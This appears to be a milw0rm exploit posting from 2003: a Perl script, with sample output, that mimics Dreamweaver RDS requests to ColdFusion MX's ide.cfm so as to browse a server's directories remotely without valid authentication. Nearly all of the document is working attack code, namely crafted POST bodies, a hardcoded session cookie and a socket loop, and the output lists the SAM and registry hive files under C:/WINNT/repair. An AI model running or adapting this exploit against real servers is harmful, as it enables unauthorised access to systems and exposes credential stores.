ColdFusion MX - Remote Development Service

1. #!/usr/bin/perl
2. # RDS_c_Dump.pl
3. # By angry packet
4.  
5. ##
6. #     THIS IS AN UNPATCHED VULNERABILITY - THIS IS AN UNPATCHED VULNERABILITY
7. #
8. # ColdFusion 6 MX Server does several things in order to get remote dir structure so we will need
9. # to recreate these functions. This is a "almost" complete emulation of a dreamweaver client connection,
10. # in like one full HTTP1/1 session witin netcat.
11. #
12. # I would like to point out that the ASPSESSID never validates so you can change this on the fly.
13. #
14. # Due to certian current situations I am not allowed to release full exploit code with
15. # ( READ, RETRIEVE, WRITE ) functions.
16. #
17. # Sample output:
18. # --------------------------------
19. # Vic7im1@cipher:~/Scripts/RDS_Sploit$ perl RDS_c_Dump.pl
20. #
21. # POST /CFIDE/main/ide.cfm?CFSRV=IDE&ACTION=BrowseDir_Studio HTTP/1.1
22. #
23. # Request String Value: 3:STR:15:C:/WINNT/repairSTR:1:*STR:0:
24. # Content-Length: 37
25. # Please wait.. ..
26. # HTTP/1.1 100 Continue
27. # Server: Microsoft-IIS/5.0
28. # Date: Tue, 01 Jul 2003 10:30:43 GMT
29. #
30. # HTTP/1.1 200 OK
31. # Server: Microsoft-IIS/5.0
32. # Date: Tue, 01 Jul 2003 10:30:43 GMT
33. # Connection: close
34. # Content-Type: text/html
35. #
36. # 50:2:F:11:autoexec.nt1:63:4383:0,02:F:9:config.nt1:64:25773:0,02:F:7:default1:66:1187843:0,
37. # 02:F:10:ntuser.dat1:66:1187843:0,02:F:3:sam1:65:204803:0,
38. # 02:F:12:secsetup.inf1:66:5735303:0,02:F:8:security1:65:286723:0,
39. # 02:F:9:setup.log1:66:1551943:0,02:F:8:software1:67:65331203:0,02:F:6:system1:66:9748483:0,0
40. # Vic7im1@cipher:~/Scripts/RDS_Sploit$
41. # ----------------------------------
42.  
43.  
44. use strict;
45. use IO::Socket;
46.  
47. use vars qw($response @clength @rarray);
48.  
49. ## Dreamweaver string requests to ide.cfm
50. ## --------------------------------------
51. #1:  3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:         Content-Length: 46
52. #2:  3:STR:7:C:/_mm/STR:1:*STR:0:                   Content-Length: 28
53. #3:  3:STR:6:C:/_mmSTR:9:ExistenceSTR:0:STR:0:STR:0:        Content-Length: 47
54. #4:  3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:         Content-Length: 46
55. #5:  3:STR:10:C:/_notes/STR:1:*STR:0:                   Content-Length: 32
56. #6:  5:STR:9:C:/_notesSTR:9:ExistenceSTR:0:STR:0:STR:0      Content-Length: 50
57. #7:  3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:         Content-Length: 46
58. #8:  5:STR:12:C:/XYIZNWSK/STR:6:CreateSTR:0:STR:0:STR:0:    Content-Length: 51
59. #9:  3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:     Content-Length: 46
60. #10: 3:STR:3:C:/STR:1:*STR:0:                   Content-Length: 24
61. #11: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:     Content-Length: 46
62. #12: 5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:  Content-Length: 53
63. #13: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:     Content-Length: 46
64. #14: 5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:  Content-Length: 53
65. #15: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:     Content-Length: 46
66. #16: 5:STR:11:C:/XYIZNWSKSTR:6:RemoveSTR:0:STR:0:DSTR:0:    Content-Length: 51
67. #17: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:     Content-Length: 46
68. #18: 3:STR:8:C:/WINNTSTR:1:*STR*STR:0:              Content-Length: 29
69. #19: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:     Content-Length: 46
70. #20: 3:STR:15:C:/WINNT/repairSTR:1:*STR:0:          Content-Length: 37
71.  
72.  
73. # Static Content-Lenght: $string_val if you plan on leaving C:\WINNT\repair you will need to know
74. # the $string_val.
75. @clength = ( "Content-Length: 46",
76.          "Content-Length: 28",
77.          "Content-Length: 47",
78.          "Content-Length: 46",
79.              #"Content-Length: 32",
80.          #"Content-Length: 50",
81.          "Content-Length: 46",
82.          "Content-Length: 51",
83.          "Content-Length: 46",
84.          "Content-Length: 24",
85.          "Content-Length: 46",
86.          "Content-Length: 53",
87.          "Content-Length: 46",
88.          "Content-Length: 53",
89.          "Content-Length: 46",
90.          "Content-Length: 51",
91.          "Content-Length: 46",
92.          "Content-Length: 29",
93.          "Content-Length: 46",
94.          "Content-Length: 37"
95.        );
96.  
97.  
98. @rarray = ( "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
99.         "3:STR:7:C:/_mm/STR:1:*STR:0:",
100.         "3:STR:6:C:/_mmSTR:9:ExistenceSTR:0:STR:0:STR:0:",
101.         "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
102.         #"3:STR:10:C:/_notes/STR:1:*STR:0:",
103.         #"5:STR:9:C:/_notesSTR:9:ExistenceSTR:0:STR:0:STR:0",
104.         "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
105.         "5:STR:12:C:/XYIZNWSK/STR:6:CreateSTR:0:STR:0:STR:0:",
106.         "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
107.         "3:STR:3:C:/STR:1:*STR:0:",
108.         "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
109.         "5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:",
110.         "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
111.         "5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:",
112.         "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
113.         "5:STR:11:C:/XYIZNWSKSTR:6:RemoveSTR:0:STR:0:DSTR:0:",
114.         "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
115.         "3:STR:8:C:/WINNTSTR:1:*STR*STR:0:",
116.         "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
117.         "3:STR:15:C:/WINNT/repairSTR:1:*STR:0:"
118.         );
119.  
120.  
121.  
122. system("clear");
123. # change target addy below.
124. my $TARGET = "192.168.0.100";
125. my $PORT = "80";
126. my $STRING = "C:/WINNT/repair";
127. my $POST = "POST /CFIDE/main/ide.cfm?CFSRV=IDE&ACTION=BrowseDir_Studio HTTP/1.1\r\n";
128.  
129.  
130. print "Generating Socket with Array Directory Values.\n";
131. my ( $i, $c);
132. for ( $i = 0; $i < @rarray; $i++  ) {
133.     for ( $c = 0; $c < @clength; $c++ ) {  
134.             if( $i == $c ) {
135.             &gen_sock($TARGET, $PORT, $rarray[$i], $clength[$c]);
136.         }
137.     }
138. }
139.  
140.  
141. sub gen_sock() {
142.     my $sock = new IO::Socket::INET(PeerAddr => $TARGET,
143.                     PeerPort => $PORT,
144.                     Proto    => 'tcp',
145.                     );
146.     die "Socket Could not be established ! $!" unless $sock;
147.     print "Target: $TARGET:$PORT\n";
148.     print "$POST\n";
149.     print "Request String Value: $rarray[$i]\n";
150.     print "$clength[$c]\n";
151.     print "Please wait.. ..\n";
152.     print $sock "$POST";
153.     print $sock "Content-Type: application/x-ColdFusionIDE\r\n";
154.     print $sock "User-Agent: Dreamweaver-RDS-SCM1.00\r\n";
155.     print $sock "Host: $TARGET\r\n";
156.     print $sock "$clength[$c]\r\n";
157.     print $sock "Connection: Keep-Alive\r\n";
158.     print $sock "Cache-Control: no-cache\r\n";
159.     print $sock "Cookie: ASPSESSIONIDQQQQGLDK=LPIHIKCAECKACDGPJCOLOAOJ\r\n";
160.     print $sock "\r\n";
161.     print $sock "$rarray[$i]";
162.    
163.     # lets return and print data to term
164.     while($response = <$sock>) {
165.         chomp($response);
166.         print "$response\n";
167.     }
168.     close($sock);
169. }
170.  
171. # milw0rm.com [2003-07-07]
172.